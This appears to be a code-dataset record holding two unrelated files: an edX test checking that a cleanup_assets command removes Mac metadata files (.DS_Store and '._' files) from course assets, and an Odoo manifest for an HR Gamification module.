cms/djangoapps/contentstore/management/commands/tests/test_cleanup_assets.py
|
167
|
"""
Test for assets cleanup of courses for Mac OS metadata files (files named ".DS_Store"
or files whose name starts with "._").
"""
from django.core.management import call_command
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.contentstore.content import XASSET_LOCATION_TAG
from xmodule.contentstore.django import contentstore
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.mongo.base import location_to_query
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.xml_importer import import_course_from_xml
from django.conf import settings
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
class ExportAllCourses(ModuleStoreTestCase):
"""
Tests assets cleanup for all courses.
"""
def setUp(self):
""" Common setup. """
super(ExportAllCourses, self).setUp()
self.content_store = contentstore()
# pylint: disable=protected-access
self.module_store = modulestore()._get_modulestore_by_type(ModuleStoreEnum.Type.mongo)
def test_export_all_courses(self):
"""
This test validates that redundant Mac metadata files ('._example.txt', '.DS_Store') are
cleaned up on import
"""
import_course_from_xml(
self.module_store,
'**replace_user**',
TEST_DATA_DIR,
['dot-underscore'],
static_content_store=self.content_store,
do_import_static=True,
verbose=True
)
course = self.module_store.get_course(SlashSeparatedCourseKey('edX', 'dot-underscore', '2014_Fall'))
self.assertIsNotNone(course)
# check that there are two assets ['example.txt', '.example.txt'] in contentstore for imported course
all_assets, count = self.content_store.get_all_content_for_course(course.id)
self.assertEqual(count, 2)
self.assertEqual(set([asset['_id']['name'] for asset in all_assets]), set([u'.example.txt', u'example.txt']))
# manually add redundant assets (file ".DS_Store" and filename starts with "._")
course_filter = course.id.make_asset_key("asset", None)
query = location_to_query(course_filter, wildcard=True, tag=XASSET_LOCATION_TAG)
query['_id.name'] = all_assets[0]['_id']['name']
asset_doc = self.content_store.fs_files.find_one(query)
asset_doc['_id']['name'] = u'._example_test.txt'
self.content_store.fs_files.insert(asset_doc)
asset_doc['_id']['name'] = u'.DS_Store'
self.content_store.fs_files.insert(asset_doc)
# check that now course has four assets
all_assets, count = self.content_store.get_all_content_for_course(course.id)
self.assertEqual(count, 4)
self.assertEqual(
set([asset['_id']['name'] for asset in all_assets]),
set([u'.example.txt', u'example.txt', u'._example_test.txt', u'.DS_Store'])
)
        # now call the cleanup_assets command and check that only the two proper assets remain in the contentstore for the course
call_command('cleanup_assets')
all_assets, count = self.content_store.get_all_content_for_course(course.id)
self.assertEqual(count, 2)
self.assertEqual(set([asset['_id']['name'] for asset in all_assets]), set([u'.example.txt', u'example.txt']))
|
osvalr/odoo
|
refs/heads/8.0
|
addons/hr_gamification/__openerp__.py
|
320
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'HR Gamification',
'version': '1.0',
'author': 'OpenERP SA',
'category': 'hidden',
'website': 'https://www.odoo.com/page/employees',
'depends': ['gamification', 'hr'],
'description': """Use the HR ressources for the gamification process.
The HR officer can now manage challenges and badges.
This allow the user to send badges to employees instead of simple users.
Badge received are displayed on the user profile.
""",
'data': [
'security/ir.model.access.csv',
'security/gamification_security.xml',
'wizard/grant_badge.xml',
'views/gamification.xml',
'views/hr_gamification.xml',
],
'auto_install': True,
}
|